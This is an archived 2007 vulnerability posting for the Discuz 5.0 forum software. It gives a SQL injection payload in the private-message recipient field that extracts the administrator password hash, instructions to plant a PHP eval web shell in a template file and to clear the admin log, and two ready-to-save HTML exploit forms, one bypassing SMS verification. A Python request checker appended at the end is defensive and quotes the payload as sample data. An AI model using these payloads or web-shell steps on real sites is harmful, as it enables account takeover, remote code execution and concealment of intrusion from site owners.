Discuz 5.0 0day + PM SMS bypass method - vulnerability warning - the black bar safety net

2007-04-27T00:00:00
ID MYHACK58:62200715242
Type myhack58
Reporter Anonymous
Modified 2007-04-27T00:00:00

Description

SQL: 0) union select password,2,0 from cdb_members where uid=1/ (the 1 in uid=1 is the ID value)

Obtain the administrator's md5 password and go into the backend. In the forum management module, edit the details to modify wap.php and insert eval($_POST[tlwbw]). The connection address is the site address + /templates/default/wap.lang.php

Haha, after you have been in the backend, don't forget to clear forumdata/cplog.php

Save the code below as an .html file. The following is the quoted fragment:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Dz5.0 0day</TITLE>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META content="MSHTML 6.00.3790.2858" name=GENERATOR></HEAD>
<BODY>
<STYLE>
BODY { SCROLLBAR-FACE-COLOR: #e4e4f3; FONT-SIZE: 9pt; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #e4e4f3; COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #e4e4f3; SCROLLBAR-ARROW-COLOR: #4444b3; SCROLLBAR-TRACK-COLOR: #efefef; FONT-FAMILY: "Courier New"; SCROLLBAR-DARKSHADOW-COLOR: #9c9cd3 }
TABLE { BORDER-RIGHT: #d8d8f0 1px; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse }
.tr { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3; TEXT-ALIGN: center }
.td { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd }
.warningColor { FONT-SIZE: 9pt; COLOR: #ff0000; FONT-FAMILY: "Courier New" }
INPUT { BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px }
TEXTAREA { BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px }
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none }
TR { FONT-SIZE: 9pt; LINE-HEIGHT: 18px; FONT-FAMILY: "Courier New" }
TD { BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New" }
.trHead { FONT-SIZE: 9pt; LINE-HEIGHT: 3px; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3 }
.inputLogin { BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; VERTICAL-ALIGN: bottom; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd }
</STYLE>


<TABLE cellSpacing=0 cellPadding=0 width=760 align=center border=0>
<FORM method=post>
<TBODY>
<TR><TD class=td height=22> Dz5.0 Exp</TD></TR>
<TR><TD class=trHead> </TD></TR>
<TR><TD class=td height=18> Url: <INPUT id=theAction onblur='this.form.the2Action.value=this.form.theAction.value+"/pm.php?action=send&pmsubmit=yes"' size=50 value=http://www.4evil.org name=theAction><BR>
<INPUT id=the2Action type=hidden name=the2Action>
Hash: <INPUT value=0094b488 name=formhash>
Msgt<INPUT size=10 value=aspxp name=msgto><BR>
<INPUT type=hidden size=10 value=aa name=subject>
<INPUT type=hidden value=aa name=message>
SQL: <INPUT size=100 value="0) union select password,2,0 from cdb_members where uid=1/" name=msgtobuddys[]></TD></TR>
<TR><TD class=td align=middle><INPUT onclick=this.form.action=this.form.the2Action.value; type=submit value=" Enter " name=Submit><INPUT type=reset value=" Reset " name=Submit32></TD></TR>
<TR><TD class=trHead> </TD></TR>
<TR><TD class=td align=right height=22>Just For Fun <A title=QQ:* href="_http://www.. org">****</A>_ 2007.3 </TD></TR></FORM></TBODY></TABLE></BODY></HTML>

PM vulnerability through the SMS verification method (source: 7 cheap BLOG):

<HTML><HEAD><TITLE>discuz</TITLE></HEAD>
<BODY>
<a href="http://1v1.name">http://1v1.name</a>
<FORM name=frm method=post target=_blank>
Url: <INPUT size=45 name=act> <INPUT size=8 name=formhash> <INPUT type=button value="submit" name=Send><br><br>
MySQL:<INPUT size=65 value='0) union select password,2,0 from cdb_members where uid=1/*' name=msgtobuddys[]>
<input type="text" name="seccodeverify" size="7">
<INPUT TYPE="hidden" NAME="pmsubmit" value="2">
<input type="hidden" name="subject" value="test">
<input type="hidden" name="message" value="test">
</FORM>
</BODY></HTML>
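
A defensive check for the requests this page describes, as an added example that is not part of the original post: it flags pm.php submissions whose msgtobuddys[] values are not plain numeric IDs, and POSTs sent directly to a file under /templates/. The function names and the sample requests are constructed for illustration, and it is an assumption that msgtobuddys[] legitimately carries only numeric user IDs.

```python
from urllib.parse import parse_qsl, urlsplit

# Constructed sample requests: (method, URL, form-encoded body).
SAMPLE_REQUESTS = [
    ("POST", "/pm.php?action=send&pmsubmit=yes",
     "formhash=0094b488&msgto=alice&subject=hi&message=hello"
     "&msgtobuddys%5B%5D=12&msgtobuddys%5B%5D=34"),
    ("POST", "/pm.php?action=send&pmsubmit=yes",
     "formhash=0094b488&msgto=aspxp&subject=aa&message=aa"
     "&msgtobuddys%5B%5D=0%29+union+select+password%2C2%2C0"
     "+from+cdb_members+where+uid%3D1%2F"),
    ("POST", "/templates/default/wap.lang.php", "tlwbw=test"),
    ("GET", "/index.php", ""),
]


def audit_request(method, url, body):
    """Return a list of findings for a single HTTP request."""
    findings = []
    parts = urlsplit(url)
    path = parts.path.lower()
    is_post = method.upper() == "POST"

    # Collect parameters from the query string and, for POST, the body.
    params = parse_qsl(parts.query)
    if is_post:
        params += parse_qsl(body)

    # Assumption: msgtobuddys[] should only ever hold numeric user IDs.
    if path.endswith("/pm.php"):
        for name, value in params:
            if name.startswith("msgtobuddys") and not (
                value.isascii() and value.isdigit()
            ):
                findings.append(f"non-numeric {name} value: {value!r}")

    # Template and language files are not form handlers; a POST sent
    # straight to one matches the modified-template access on this page.
    if is_post and "/templates/" in path:
        findings.append(f"POST to template file: {path}")
    return findings


def audit(requests):
    """Map request index -> findings, keeping only flagged requests."""
    return {i: f for i, r in enumerate(requests) if (f := audit_request(*r))}
```
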